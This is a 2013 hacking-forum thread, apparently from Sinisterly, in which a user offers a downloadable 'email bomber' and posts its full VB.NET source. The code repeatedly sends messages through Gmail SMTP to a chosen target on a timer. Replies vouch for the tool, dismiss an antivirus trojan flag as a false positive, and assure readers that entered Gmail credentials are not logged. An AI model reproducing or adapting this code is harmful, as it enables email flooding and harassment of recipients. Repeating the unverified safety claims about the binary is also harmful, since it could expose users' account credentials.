![]() |
|
Simple Email Bomber - Printable Version +- Sinisterly (https://sinister.li) +-- Forum: Coding (https://sinister.li/Forum-Coding) +--- Forum: Coding (https://sinister.li/Forum-Coding--71) +--- Thread: Simple Email Bomber (/Thread-Simple-Email-Bomber) |
Simple Email Bomber - Gingie - 07-18-2013 ![]() Simple and easy Email Bomber I made. Not much explanation to do for this lol. Download: http://www.mediafire.com/?4efqda5d3c3oyko Virus Scan: https://www.virustotal.com/en/file/accad815eac27ba277d4588994916c887c0dd3c16bf329151eec6c05589c37e0/analysis/1374116611/ (Ikarus is saying trojan, but Blue can vouch that I make 100% clean programs..Plus honestly why would I put a virus into an email bomber xD) Here's my source Code: Imports System.Net.Mail
Imports System.IO
Public Class Form1
Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
Timer1.Start()
End Sub
Private Sub Button3_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button3.Click
Timer1.Stop()
End Sub
Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
Dim MyMailMessage As New MailMessage
Try
MyMailMessage.From() = New MailAddress(TextBox1.Text)
MyMailMessage.To.Add(TextBox3.Text)
MyMailMessage.Subject = TextBox5.Text
MyMailMessage.Body = (TextBox4.Text)
Dim SMTP As New SmtpClient("smtp.gmail.com")
SMTP.Port = 587
SMTP.EnableSsl = True
SMTP.Credentials = New System.Net.NetworkCredential(TextBox1.Text, TextBox2.Text)
SMTP.Send(MyMailMessage)
Catch ex As Exception
End Try
End Sub
Private Sub Button2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button2.Click
Timer1.Interval = TextBox6.Text
End Sub
Private Sub Button4_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button4.Click
MsgBox("You have to set the time interval first and click set speed before clicking bomb. 1 = 1 second. ~Gingie")
End Sub
End ClassRE: Simple Email Bomber - Platinum - 07-18-2013 I'm going to test this soon, I will share the results. Scan looks clean to me. People, there is no need to worry. I have tested this program and it's safe to use. You have to enter your Gmail credentials but they will not be logged or stored. Enjoy! Spoiler:![]() RE: Simple Email Bomber - Gingie - 07-18-2013 Alrighty. Let me know if something's not working
RE: Simple Email Bomber - Eternity - 07-18-2013 Is the source code included ? Doesn't specify in the thread. Nice work btw! RE: Simple Email Bomber - Gingie - 07-19-2013 No it's not. But I could release the source if you like
RE: Simple Email Bomber - Eternity - 07-19-2013 (07-19-2013, 01:59 AM)Gingie Wrote: No it's not. But I could release the source if you like That would be great! RE: Simple Email Bomber - Hexology - 07-19-2013 Vouch for Gingie's program, saw some of his code on skype; False positive's in e-mail bombers are due to the fact that keylogger's send emails the same exact way, so some lazy virus company put a void on the whole code line, which will make it come up as a virus. RE: Simple Email Bomber - Eternity - 07-19-2013 (07-19-2013, 02:03 AM)Hexology Wrote: Vouch for Gingie's program, saw some of his code on skype; False positive's in e-mail bombers are due to the fact that keylogger's send emails the same exact way, so some lazy virus company put a void on the whole code line, which will make it come up as a virus. Are you referring to me ? RE: Simple Email Bomber - Hexology - 07-19-2013 (07-19-2013, 02:05 AM)Eternity Wrote:(07-19-2013, 02:03 AM)Hexology Wrote: Vouch for Gingie's program, saw some of his code on skype; False positive's in e-mail bombers are due to the fact that keylogger's send emails the same exact way, so some lazy virus company put a void on the whole code line, which will make it come up as a virus. No, I never mentioned your name in here. I'm referring to the OP, "There's a false positive". RE: Simple Email Bomber - Gingie - 07-19-2013 (07-19-2013, 02:07 AM)Hexology Wrote:Thanks Hex(07-19-2013, 02:05 AM)Eternity Wrote:(07-19-2013, 02:03 AM)Hexology Wrote: Vouch for Gingie's program, saw some of his code on skype; False positive's in e-mail bombers are due to the fact that keylogger's send emails the same exact way, so some lazy virus company put a void on the whole code line, which will make it come up as a virus. . I'm most likely gonna release the source so everyone can see for themselves.
|